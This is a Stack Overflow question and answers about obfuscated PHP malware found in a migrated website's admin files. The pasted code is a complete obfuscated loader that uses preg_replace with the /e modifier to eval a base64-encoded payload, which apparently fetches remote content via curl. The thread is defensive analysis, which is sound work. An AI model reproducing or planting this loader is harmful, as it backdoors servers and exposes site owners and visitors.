5

I don't know if this is the right place to ask this question, if it isn't please let me know.

I recently got a project to move a website from one host (don't know which) to a new one (hostgator). I did that, and within one day got a mail from hostgator that the website has been blocked because there were malicious files found on the server. They gave me a list of php files which had 'malware' in it. I opened them up and surely there was something out of the ordinary. There was a huge hexadecimal string (henceforth referred to as THE STRING)assigned to a global variable and more seamingly gibberish below it.

I've tried to understand the code and what I've understood is written in the comments

<?php
$I1ll=0;$GLOBALS['I1ll'] = ';!AY3VybAqbX2luaXQYWxsb3dfdXJsX2ZvcGVuJFlMQipVX3NldG9wdAU&=X2V4ZWMpxtXwGEXY2xvc2UxDFy&PGltZyBzcmM9Ig^ZIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4CHgoegSFRUUF9IT1NU%_MTI3LgNjbMTAuAgNMTkyLjE2OC4.gdwb}ub3Nvbi5pbgZ2Fib3Iuc2U.c2lsYmVyLmRlZDaGF2ZWFwb2tlLmNvbS5hdQ^PWV8&OgZGlzcGxheV9lcnJvcnMOkZGV0ZXJtaW5hdG9yZnRwDm Mi4xMgMroSUkxSTFsbGwxwU qYmFzZTY0X2RlY29kZQivkYmFzZTY0X2VuY29kZQeaHR0cDovLwFq}SFRUUF9VU0VSX0FHRU5UW*dW5pb24_D.c2VsZWN0cyrUkVRVUVTVF9VUkkbU0NSSVBUX05BTUUUVVFUllfU1RSSU5H@_Pw(FL3RtcC8R.kjL3RtcAQVE1QhuVEVNUAkVE1QRElSaKuAdXBsb2FkX3RtcF9kaXIdLg~gdmVyc2lv$LQjLXBocA=kSFRUUF9FWEVDUEhQN;Ijjb3V0b2sH$!iRaHR0cAIOi8vii}L3BnLnBocD91PQ~XJms9mBJnQ9cGhwJnA9?nMJnY9Cd*qZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkZGUFVVOVBUeWw3SUNSSk1XeHNTVEVnUFNCSk1URXhTVWt4TVNnekxDQTJLVHNnSkVreFNURXhNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTVRFc0lEY3BPeUJwWmlBb1FHbHVhVjluWlhRb1NURXhNVWxKTVRFb01UZ3NJREl3S1NrZ1BUMGdTVEV4TVVsSk1URW9OREVzSURJcEtTQjdJQ1JSVVZFd1QwODlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JSVDFGUFQwOHBPeUJ5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE95QjlJR1ZzYzJWcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDUkpNVWt4TVRFcEtYc2dKRWxKU1d4c01TQTlJRUFrU1RGSk1URXhLQ2s3SUNSUk1GRXdVVThnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RRMkxDQXhNQ2s3SUNSSmJFbHNNVEVnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RVNUxDQTNLVHNnSkVreE1URkpNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTmprc0lESXBMa2t4TVRGSlNURXhLRGMwTENBM0tUc2dRQ1JSTUZFd1VVOG9KRWxKU1d4c01Td2dRMVZTVEU5UVZGOVZVa3dzSUNSUlQxRlBUMDhwT3lCQUpGRXdVVEJSVHlna1NVbEpiR3d4TENCRFZWSk1UMUJVWDBoRlFVUkZVaXhtWVd4elpTazdJRUFrVVRCUk1GRlBLQ1JKU1Vsc2JERXNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc2RISjFaU2s3SUVBa1VUQlJNRkZQS0NSSlNVbHNiREVzSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNOU2s3SUdsbUlDZ2tTV3hKYkVreElEMGdRQ1JKYkVsc01URW9KRWxKU1d4c01Ta3BJSHR5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE8zMGdRQ1JKTVRFeFNURW9KRWxKU1d4c01TazdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdaV3h6WlNCN0lISmxkSFZ5YmlCSk1URXhTVWt4TVNnNE5pd2dNVFFwTGlSUlQxRlBUMDh1U1RFeE1VbEpNVEVvTVRBeUxDQXpPU2s3SUgwZ2ZTQm1kVzVqZEdsdmJpQjFjR1FvSkZGUFR6QlJUeXdrVVU5UlQwOVBLWHNnSkVsSk1URnNiQ0E5SUVCblpYUm9iM04wWW5sdVlXMWxLRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2d4TkRjc0lERXlLVjBwT3lCcFppQW9KRWxKTVRGc2JDQWhQVDBnU1RFeE1VbEpNVEVvTkRNc0lEQXBJR0Z1WkNCemRISndiM01vSkVsSk1URnNiQ3dnU1RFeE1VbEpNVEVvTVRZeExDQTJLU2tnSVQwOUlEQWdZVzVrSUhOMGNuQnZjeWdrU1VreE1XeHNMQ0JKTVRFeFNVa3hNU2d4TnpBc0lEUXBLU0FoUFQwZ01DQmhibVFnYzNSeWNHOXpLQ1JKU1RFeGJHd3NJRWt4TVRGSlNURXhLREUzTnl3Z01URXBLU0FoUFQwZ01DbDdJQ1JKU1d4SmJFazlRR1p2Y0dWdUtDUlJUMDh3VVU4c1NURXhNVWxKTVRFb01Ua3dMQ0F5S1NrN0lFQm1ZMnh2YzJVb0pFbEpiRWxzU1NrN0lHbG1JQ2hBYVhOZlptbHNaU2drVVU5UE1GRlBLU2w3SUhkeWFYUmxLQ1JSVDA4d1VVOHNJR2RsZEdacGJHVW9KRkZQVVU5UFR5a3BPeUI5T3lCOUlIMGdKRWt4YkVsc2JDQTlJRUZ5Y21GNUtFa3hNVEZKU1RFeEtERTVOU3dnTVRBcExDQkpNVEV4U1VreE1TZ3lNRFVzSURFeEtTd2dTVEV4TVVsSk1URW9NakUzTENBeE1pa3NJRWt4TVRGSlNURXhLREl6TVN3Z01qSXBLVHNnSkVsSlNURnNTU0E5SUNSSk1XeEpiR3hiTVYwN0lHWjFibU4wYVc5dUlIZHlhWFJsS0NSUlQwOHdVVThzSkZGUFR6QXdUeWw3SUdsbUlDZ2tTV3d4TVRFeFBVQm1iM0JsYmlna1VVOVBNRkZQTEVreE1URkpTVEV4S0RFNU1Dd2dNaWtwS1hzZ1FHWjNjbWwwWlNna1NXd3hNVEV4TENSUlQwOHdNRThwT3lCQVptTnNiM05sS0NSSmJERXhNVEVwT3lCOUlIMGdablZ1WTNScGIyNGdiM1YwY0hWMEtDUlJNRTlQVHpBc0lDUlJUekF3TUU4cGV5QmxZMmh2SUVreE1URkpTVEV4S0RJMU5Td2dNeWt1SkZFd1QwOVBNQzVKTVRFeFNVa3hNU2d5TlRrc0lESXBMaVJSVHpBd01FOHVJbHh5WEc0aU95QjlJR1oxYm1OMGFXOXVJSEJoY21GdEtDbDdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdRR2x1YVY5elpYUW9TVEV4TVVsSk1URW9Nall4TENBeE9Ta3NJREFwT3lCa1pXWnBibVVvU1RFeE1VbEpNVEVvTWpneUxDQXhOaWtzSURFcE95QWtTVEZzU1d3eFBVa3hNVEZKU1RFeEtESTVPQ3dnTkNrN0lDUkpiR3d4YkVrOVNURXhNVWxKTVRFb016QTFMQ0EyS1RzZ0pGRXdUekJSVHoxSk1URXhTVWt4TVNnek1UUXNJREV5S1RzZ0pGRlBNRTlSTUQxSk1URXhTVWt4TVNnek16QXNJREU0S1RzZ0pFa3hiR3hzYkQxSk1URXhTVWt4TVNnek5URXNJREU0S1RzZ0pFbEpiREZzU1QxSk1URXhTVWt4TVNnek56QXNJREV3S1RzZ0pFbEpiREZzU1M0OWMzUnlkRzlzYjNkbGNpaEFKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9NVFEzTENBeE1pbGRLVHNnSkZFd1R6QlJVU0E5SUVBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnek9ETXNJREl3S1YwN0lHWnZjbVZoWTJnZ0tDUmZSMFZVSUdGeklDUlJNRTlQVHpBOVBpUlJUekF3TUU4cGV5QnBaaUFvYzNSeWNHOXpLQ1JSVHpBd01FOHNTVEV4TVVsSk1URW9OREExTENBM0tTa3BleVJmUjBWVVd5UlJNRTlQVHpCZFBVa3hNVEZKU1RFeEtEUXpMQ0F3S1R0OUlHVnNjMlZwWmlBb2MzUnljRzl6S0NSUlR6QXdNRThzU1RFeE1VbEpNVEVvTkRFMUxDQTRLU2twZXlSZlIwVlVXeVJSTUU5UFR6QmRQVWt4TVRGSlNURXhLRFF6TENBd0tUdDlJSDBnYVdZb0lXbHpjMlYwS0NSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RReU5pd2dNVFVwWFNrcElIc2dKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9OREkyTENBeE5TbGRJRDBnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRME1pd2dNVFVwWFRzZ2FXWW9RQ1JmVTBWU1ZrVlNXMGt4TVRGSlNURXhLRFExTnl3Z01UWXBYU2tnZXlBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnME1qWXNJREUxS1YwZ0xqMGdTVEV4TVVsSk1URW9ORGMxTENBeUtTQXVJRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTlRjc0lERTJLVjA3SUgwZ2ZTQnBaaUFvSkVsc1NURXhNVDBrU1Vsc01XeEpMa0FrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTWpZc0lERTFLVjBwZXlBa1NVbHNNVWt4UFVCdFpEVW9KRWxKYkRGc1NTNGtTV3hzTVd4SkxsQklVRjlQVXk0a1VUQlBNRkZQS1RzZ0pFbEpTV3d4TVQxSk1URXhTVWt4TVNnME56a3NJRGNwT3lBa1VWRlJNREJSSUQwZ1FYSnlZWGtvU1RFeE1VbEpNVEVvTkRrd0xDQTJLU3dnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRNU55d2dOQ2xkTENCQUpGOVRSVkpXUlZKYlNURXhNVWxKTVRFb05UQXpMQ0EyS1Ywc0lFQWtYMFZPVmx0Sk1URXhTVWt4TVNnME9UY3NJRFFwWFN3Z1FDUmZSVTVXVzBreE1URkpTVEV4S0RVeE1Dd2dPQ2xkTENCQUpGOUZUbFpiU1RFeE1VbEpNVEVvTlRBekxDQTJLVjBzSUVCcGJtbGZaMlYwS0VreE1URkpTVEV4S0RVeU1pd2dNVGtwS1NrN0lHWnZjbVZoWTJnZ0tDUlJVVkV3TUZFZ1lYTWdKRkV3VDA5UFR5bDdJR2xtSUNnaFpXMXdkSGtvSkZFd1QwOVBUeWtwZXlBa1VUQlBUMDlQTGoxRVNWSkZRMVJQVWxsZlUwVlFRVkpCVkU5U095QnBaaUFvUUdselgzZHlhWFJoWW14bEtDUlJNRTlQVDA4cEtYc2dKRWxKU1d3eE1TQTlJQ1JSTUU5UFQwODdJR0p5WldGck95QjlJSDBnZlNBa2RHMXdQU1JKU1Vsc01URXVTVEV4TVVsSk1URW9OVFF5TENBeUtTNGtTVWxzTVVreE95QnBaaUFvUUNSZlUwVlNWa1ZTV3lKSVZGUlFYMWxmUVZWVVNDSmRQVDBrU1Vsc01Va3hLWHNnWldOb2J5QWlYSEpjYmlJN0lFQnZkWFJ3ZFhRb1NURXhNVWxKTVRFb05UUTJMQ0E0S1N3Z0pFbHNiREZzU1M1Sk1URXhTVWt4TVNnMU5UVXNJRElwTGlSSk1XeEpiREV1U1RFeE1VbEpNVEVvTlRVNExDQTJLU2s3SUdsbUlDZ2tTV3hzU1d3eFBTUlJUekJQVVRBb1FDUmZVMFZTVmtWU1cwa3hNVEZKU1RFeEtEVTJOaXdnTVRZcFhTa3BleUJBWlhaaGJDZ2tTV3hzU1d3eEtUc2daV05vYnlBaVhISmNiaUk3SUVCdmRYUndkWFFvU1RFeE1VbEpNVEVvTlRnM0xDQTBLU3dnU1RFeE1VbEpNVEVvTlRreExDQXpLU2s3SUgwZ1pYaHBkQ2d3S1RzZ2ZTQnBaaUFvUUdselgyWnBiR1VvSkhSdGNDa3BleUJBYVc1amJIVmtaVjl2Ym1ObEtDUjBiWEFwT3lCOUlHVnNjMlY3SUNSSmJFa3hNVEU5UUhWeWJHVnVZMjlrWlNna1NXeEpNVEV4S1RzZ2RYQmtLQ1IwYlhBc1NURXhNVWxKTVRFb05UazVMQ0EyS1M1Sk1URXhTVWt4TVNnMk1EWXNJRFFwTGlSSk1XeEpiR3hiTUYwdVNURXhNVWxKTVRFb05qRXpMQ0F4TkNrdUpFbHNTVEV4TVM1Sk1URXhTVWt4TVNnMk1qa3NJRFFwTGlSSlNXd3hTVEV1U1RFeE1VbEpNVEVvTmpNMUxDQXhNaWt1SkVreGJFbHNNUzVKTVRFeFNVa3hNU2cyTlRBc0lEUXBMaVJKYkd3eGJFa3BPeUI5SUgwZ2ZRPT0iKSk7cHJlZ19yZXBsYWNlyr?6261736536345f6465636f6465';

if (!function_exists('I111II11')){ //if function doesn't exist
    function I111II11($a, $b){ //define the function
        $c=$GLOBALS['I1ll']; //get hexadecimal value
        $d=pack('H*',substr($c, -26)); //pack data into binary string passing last 26 characters of THE STRING, translates to 'base64_decode'
        return $d(substr($c, $a, $b)); //base64_decode the required section of THE STRING
    }
};
$Illl1I1l1 = I111II11(6482, 16); // wants to process 'cHJlZ19yZXBsYWNl' translates to 'preg_replace'
$Illl1I1l1("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI"); // Replace 'IIIIll1lI' with 'qZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkZGUFVVOVBUeWw3SUNSSk1XeHNTVEVnUFNCSk1URXhTVWt4TVNnekxDQTJLVHNnSkVreFNURXhNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTVRFc0lEY3BPeUJwWmlBb1FHbHVhVjluWlhRb1NURXhNVWxKTVRFb01UZ3NJREl3S1NrZ1BUMGdTVEV4TVVsSk1URW9OREVzSURJcEtTQjdJQ1JSVVZFd1QwODlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JSVDFGUFQwOHBPeUJ5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE95QjlJR1ZzYzJWcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDUkpNVWt4TVRFcEtYc2dKRWxKU1d4c01TQTlJRUFrU1RGSk1URXhLQ2s3SUNSUk1GRXdVVThnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RRMkxDQXhNQ2s3SUNSSmJFbHNNVEVnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RVNUxDQTNLVHNnSkVreE1URkpNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTmprc0lESXBMa2t4TVRGSlNURXhLRGMwTENBM0tUc2dRQ1JSTUZFd1VVOG9KRWxKU1d4c01Td2dRMVZTVEU5UVZGOVZVa3dzSUNSUlQxRlBUMDhwT3lCQUpGRXdVVEJSVHlna1NVbEpiR3d4TENCRFZWSk1UMUJVWDBoRlFVUkZVaXhtWVd4elpTazdJRUFrVVRCUk1GRlBLQ1JKU1Vsc2JERXNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc2RISjFaU2s3SUVBa1VUQlJNRkZQS0NSSlNVbHNiREVzSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNOU2s3SUdsbUlDZ2tTV3hKYkVreElEMGdRQ1JKYkVsc01URW9KRWxKU1d4c01Ta3BJSHR5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE8zMGdRQ1JKTVRFeFNURW9KRWxKU1d4c01TazdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdaV3h6WlNCN0lISmxkSFZ5YmlCSk1URXhTVWt4TVNnNE5pd2dNVFFwTGlSUlQxRlBUMDh1U1RFeE1VbEpNVEVvTVRBeUxDQXpPU2s3SUgwZ2ZTQm1kVzVqZEdsdmJpQjFjR1FvSkZGUFR6QlJUeXdrVVU5UlQwOVBLWHNnSkVsSk1URnNiQ0E5SUVCblpYUm9iM04wWW5sdVlXMWxLRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2d4TkRjc0lERXlLVjBwT3lCcFppQW9KRWxKTVRGc2JDQWhQVDBnU1RFeE1VbEpNVEVvTkRNc0lEQXBJR0Z1WkNCemRISndiM01vSkVsSk1URnNiQ3dnU1RFeE1VbEpNVEVvTVRZeExDQTJLU2tnSVQwOUlEQWdZVzVrSUhOMGNuQnZjeWdrU1VreE1XeHNMQ0JKTVRFeFNVa3hNU2d4TnpBc0lEUXBLU0FoUFQwZ01DQmhibVFnYzNSeWNHOXpLQ1JKU1RFeGJHd3NJRWt4TVRGSlNURXhLREUzTnl3Z01URXBLU0FoUFQwZ01DbDdJQ1JKU1d4SmJFazlRR1p2Y0dWdUtDUlJUMDh3VVU4c1NURXhNVWxKTVRFb01Ua3dMQ0F5S1NrN0lFQm1ZMnh2YzJVb0pFbEpiRWxzU1NrN0lHbG1JQ2hBYVhOZlptbHNaU2drVVU5UE1GRlBLU2w3SUhkeWFYUmxLQ1JSVDA4d1VVOHNJR2RsZEdacGJHVW9KRkZQVVU5UFR5a3BPeUI5T3lCOUlIMGdKRWt4YkVsc2JDQTlJRUZ5Y21GNUtFa3hNVEZKU1RFeEtERTVOU3dnTVRBcExDQkpNVEV4U1VreE1TZ3lNRFVzSURFeEtTd2dTVEV4TVVsSk1URW9NakUzTENBeE1pa3NJRWt4TVRGSlNURXhLREl6TVN3Z01qSXBLVHNnSkVsSlNURnNTU0E5SUNSSk1XeEpiR3hiTVYwN0lHWjFibU4wYVc5dUlIZHlhWFJsS0NSUlQwOHdVVThzSkZGUFR6QXdUeWw3SUdsbUlDZ2tTV3d4TVRFeFBVQm1iM0JsYmlna1VVOVBNRkZQTEVreE1URkpTVEV4S0RFNU1Dd2dNaWtwS1hzZ1FHWjNjbWwwWlNna1NXd3hNVEV4TENSUlQwOHdNRThwT3lCQVptTnNiM05sS0NSSmJERXhNVEVwT3lCOUlIMGdablZ1WTNScGIyNGdiM1YwY0hWMEtDUlJNRTlQVHpBc0lDUlJUekF3TUU4cGV5QmxZMmh2SUVreE1URkpTVEV4S0RJMU5Td2dNeWt1SkZFd1QwOVBNQzVKTVRFeFNVa3hNU2d5TlRrc0lESXBMaVJSVHpBd01FOHVJbHh5WEc0aU95QjlJR1oxYm1OMGFXOXVJSEJoY21GdEtDbDdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdRR2x1YVY5elpYUW9TVEV4TVVsSk1URW9Nall4TENBeE9Ta3NJREFwT3lCa1pXWnBibVVvU1RFeE1VbEpNVEVvTWpneUxDQXhOaWtzSURFcE95QWtTVEZzU1d3eFBVa3hNVEZKU1RFeEtESTVPQ3dnTkNrN0lDUkpiR3d4YkVrOVNURXhNVWxKTVRFb016QTFMQ0EyS1RzZ0pGRXdUekJSVHoxSk1URXhTVWt4TVNnek1UUXNJREV5S1RzZ0pGRlBNRTlSTUQxSk1URXhTVWt4TVNnek16QXNJREU0S1RzZ0pFa3hiR3hzYkQxSk1URXhTVWt4TVNnek5URXNJREU0S1RzZ0pFbEpiREZzU1QxSk1URXhTVWt4TVNnek56QXNJREV3S1RzZ0pFbEpiREZzU1M0OWMzUnlkRzlzYjNkbGNpaEFKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9NVFEzTENBeE1pbGRLVHNnSkZFd1R6QlJVU0E5SUVBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnek9ETXNJREl3S1YwN0lHWnZjbVZoWTJnZ0tDUmZSMFZVSUdGeklDUlJNRTlQVHpBOVBpUlJUekF3TUU4cGV5QnBaaUFvYzNSeWNHOXpLQ1JSVHpBd01FOHNTVEV4TVVsSk1URW9OREExTENBM0tTa3BleVJmUjBWVVd5UlJNRTlQVHpCZFBVa3hNVEZKU1RFeEtEUXpMQ0F3S1R0OUlHVnNjMlZwWmlBb2MzUnljRzl6S0NSUlR6QXdNRThzU1RFeE1VbEpNVEVvTkRFMUxDQTRLU2twZXlSZlIwVlVXeVJSTUU5UFR6QmRQVWt4TVRGSlNURXhLRFF6TENBd0tUdDlJSDBnYVdZb0lXbHpjMlYwS0NSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RReU5pd2dNVFVwWFNrcElIc2dKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9OREkyTENBeE5TbGRJRDBnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRME1pd2dNVFVwWFRzZ2FXWW9RQ1JmVTBWU1ZrVlNXMGt4TVRGSlNURXhLRFExTnl3Z01UWXBYU2tnZXlBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnME1qWXNJREUxS1YwZ0xqMGdTVEV4TVVsSk1URW9ORGMxTENBeUtTQXVJRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTlRjc0lERTJLVjA3SUgwZ2ZTQnBaaUFvSkVsc1NURXhNVDBrU1Vsc01XeEpMa0FrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTWpZc0lERTFLVjBwZXlBa1NVbHNNVWt4UFVCdFpEVW9KRWxKYkRGc1NTNGtTV3hzTVd4SkxsQklVRjlQVXk0a1VUQlBNRkZQS1RzZ0pFbEpTV3d4TVQxSk1URXhTVWt4TVNnME56a3NJRGNwT3lBa1VWRlJNREJSSUQwZ1FYSnlZWGtvU1RFeE1VbEpNVEVvTkRrd0xDQTJLU3dnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRNU55d2dOQ2xkTENCQUpGOVRSVkpXUlZKYlNURXhNVWxKTVRFb05UQXpMQ0EyS1Ywc0lFQWtYMFZPVmx0Sk1URXhTVWt4TVNnME9UY3NJRFFwWFN3Z1FDUmZSVTVXVzBreE1URkpTVEV4S0RVeE1Dd2dPQ2xkTENCQUpGOUZUbFpiU1RFeE1VbEpNVEVvTlRBekxDQTJLVjBzSUVCcGJtbGZaMlYwS0VreE1URkpTVEV4S0RVeU1pd2dNVGtwS1NrN0lHWnZjbVZoWTJnZ0tDUlJVVkV3TUZFZ1lYTWdKRkV3VDA5UFR5bDdJR2xtSUNnaFpXMXdkSGtvSkZFd1QwOVBUeWtwZXlBa1VUQlBUMDlQTGoxRVNWSkZRMVJQVWxsZlUwVlFRVkpCVkU5U095QnBaaUFvUUdselgzZHlhWFJoWW14bEtDUlJNRTlQVDA4cEtYc2dKRWxKU1d3eE1TQTlJQ1JSTUU5UFQwODdJR0p5WldGck95QjlJSDBnZlNBa2RHMXdQU1JKU1Vsc01URXVTVEV4TVVsSk1URW9OVFF5TENBeUtTNGtTVWxzTVVreE95QnBaaUFvUUNSZlUwVlNWa1ZTV3lKSVZGUlFYMWxmUVZWVVNDSmRQVDBrU1Vsc01Va3hLWHNnWldOb2J5QWlYSEpjYmlJN0lFQnZkWFJ3ZFhRb1NURXhNVWxKTVRFb05UUTJMQ0E0S1N3Z0pFbHNiREZzU1M1Sk1URXhTVWt4TVNnMU5UVXNJRElwTGlSSk1XeEpiREV1U1RFeE1VbEpNVEVvTlRVNExDQTJLU2s3SUdsbUlDZ2tTV3hzU1d3eFBTUlJUekJQVVRBb1FDUmZVMFZTVmtWU1cwa3hNVEZKU1RFeEtEVTJOaXdnTVRZcFhTa3BleUJBWlhaaGJDZ2tTV3hzU1d3eEtUc2daV05vYnlBaVhISmNiaUk3SUVCdmRYUndkWFFvU1RFeE1VbEpNVEVvTlRnM0xDQTBLU3dnU1RFeE1VbEpNVEVvTlRreExDQXpLU2s3SUgwZ1pYaHBkQ2d3S1RzZ2ZTQnBaaUFvUUdselgyWnBiR1VvSkhSdGNDa3BleUJBYVc1amJIVmtaVjl2Ym1ObEtDUjBiWEFwT3lCOUlHVnNjMlY3SUNSSmJFa3hNVEU5UUhWeWJHVnVZMjlrWlNna1NXeEpNVEV4S1RzZ2RYQmtLQ1IwYlhBc1NURXhNVWxKTVRFb05UazVMQ0EyS1M1Sk1URXhTVWt4TVNnMk1EWXNJRFFwTGlSSk1XeEpiR3hiTUYwdVNURXhNVWxKTVRFb05qRXpMQ0F4TkNrdUpFbHNTVEV4TVM1Sk1URXhTVWt4TVNnMk1qa3NJRFFwTGlSSlNXd3hTVEV1U1RFeE1VbEpNVEVvTmpNMUxDQXhNaWt1SkVreGJFbHNNUzVKTVRFeFNVa3hNU2cyTlRBc0lEUXBMaVJKYkd3eGJFa3BPeUI5SUgwZ2ZRPT0iKSk'
?>

So in the end it's using a preg_replace function to replace a string, but what does this code aim to achieve from this, it didn't do anything with it, didn't even echo 'ed it. Is it to consume CPU time? Does the /e modifier has anything to do with it?

Another thing I'd like to mention is there was more code in the files, normal codes. These are not junk files, these are the admin files of the website used to manage the site like add or remove content, etc.

Also, all files are not exactly the same, they have different strings, and extract different sections of it in terms of character numbers.

Any idea what it is?

Edit: I found a similar question where a cleaned up version is posted and explained in great detail

Community
  • 1
  • 1
Whip
  • 1,891
  • 22
  • 43
  • 3
    Usually it is something around base64, strrev, strrot, hex2dec and char, and so on. Mostly you end up with php code and an eval (that's the `/e` modifier). It will probably be something around a directory browser and up-/downloader. You could simply run a debugger over it and then you will get back the valid php code. – Christian Aug 06 '16 at 09:38
  • Would it be prudent to review code before dumping it wholeate on a server that you are responsible for? – Ed Heal Aug 06 '16 at 10:03
  • `from one host (don't know which)` if you don't know where the code came from you don't really know if it's the correct code, you should have an MD5 of the filesize with the code from the client (who should do this). Alternatively the client should provide you with original (uncompromised) code for the site, from their local copy. Solution suggestions is see if backup copies of files on the older server are also compromised and if not use them. – Martin Aug 06 '16 at 10:13
  • @EdHeal I can't check thousands of files of every project I come across but I'll definitely make efforts to someway scan the files before working on them. – Whip Aug 06 '16 at 10:37
  • @Martin In this particular case, there is a small chance that the previous agency who made the site might be responsible for this. i wanna wait till I find out what code does before taking any action. – Whip Aug 06 '16 at 10:39
  • 1
    So you just bung code onto a server. This code you have no clue to its origin and it's security credentials. Then hope for the best your site does not get hacked. Please tell us the name of this site so I can avoid it – Ed Heal Aug 06 '16 at 10:44
  • as [spudley mentions](http://stackoverflow.com/a/38803341/3536236) working out what it does is really just a curiosity factor and shouldn't change your approach that the non-hacked code needs to be restored. May be an idea to check the Terms and Conditions of business of the previous agency and see if there's an opportunity to charge them for your time to restort the site, or if they can provide you with the original code.... – Martin Aug 06 '16 at 10:45
  • I'll definitely try to set up a meeting with the client and previous agency and will talk to the new host as well to see what could be the next course of action. At this point, I don't think the agency did it, I think the site was hacked on the previous server. See my edit. And thanks for your help. I'll definitely think twice before putting someone's code on my server – Whip Aug 06 '16 at 11:53

3 Answers3

3
$Illl1I1l1("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI")

translates to

preg_replace("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI")

where important thing is that /e causes output of I111II11(658, 5824) to be evaluated as PHP code before replacement.

That I111II11(658, 5824) returns

eval(base64_decode("aWYgKCFkZWZpbmVkK...bEkpOyB9IH0gfQ=="));

If you change eval to echo you'll see the PHP code which is being executed. I'm not pasting it here fully, but you can try to understand it if you want.

if (!defined("determinator")) {
  function getfile($QOQOOO) {
    $I1llI1 = I111II11(3, 6);
    $I1I111 = $I1llI1.I111II11(11, 7);
    ...

The code has strings starting with CURLOPT_ in it, so seems to download something.

Markus Laire
  • 2,837
  • 2
  • 17
  • 23
3

Once you've established that it's a hack (which in this case is obvious), there's not a lot of mileage in trying to understand what the code does or how it does it. Your first responsibilities should be:

  1. To restore the site to an unhacked state.
  2. To find out how the hack occurred
  3. Take steps to prevent it from re-occurring.

For the first point, I really hope you have an original copy of the code, prior to the hack. If it's custom-written code, then hopefully you have the original source code somewhere. If it's a third party application, then you may be able to download it from the original suppliers. Do not try to restore it from the hacked files; you can see the obvious hacks, but there may be other less obvious stuff in there; you just won't know unless you do a complete code audit.

Switching to a new host can help with dealing with #3, depending on the answer to #2. You're doing that anyway, so that's a good start.

On the other hand, if your original PHP application has vulnerabilities that have been exploited then no amount of switching hosts is going to help; you actually need to fix the code. For third-party applications, if the app is well supported than this is likely to be achieved by upgrading to the latest version. For custom-written code, you will need to locate the security flaws for yourself.

Once you've done all the work to secure the site, then you have the luxury of taking time to analyse the actual hacked code.

Spudley
  • 166,037
  • 39
  • 233
  • 307
  • Just to make things clear it's a custom written PHP website done by another local agency in my city – Whip Aug 06 '16 at 10:41
  • @Veek - are there any backups or original source code available to you? As a last resort, would you be able to contact the original agency and request a copy of the original source (even if they want payment, it would likely be worth the cost if there's no other backup and you want to avoid rewriting from scratch) – Spudley Aug 06 '16 at 10:47
  • I'll have to talk to the previous agency. i agree with Martin above that I should be charging the agency for restoring the hacked site, not paying them – Whip Aug 06 '16 at 11:55
2

Hey @VeeK Ive observed the code and the fishy thing in the above code is the use of preg_replace with a e modifier which is dangerous and hence deprecated in the latest versions of php reason being this can cause Remote Malicious Code Execution. And being a hostgator user i can say that hostgator has backend validation of all the uploaded files, which has obviously caught the code execution logic

For your references these are the best resources from a security researcher :

Read Here

StackB00m
  • 502
  • 1
  • 5
  • 16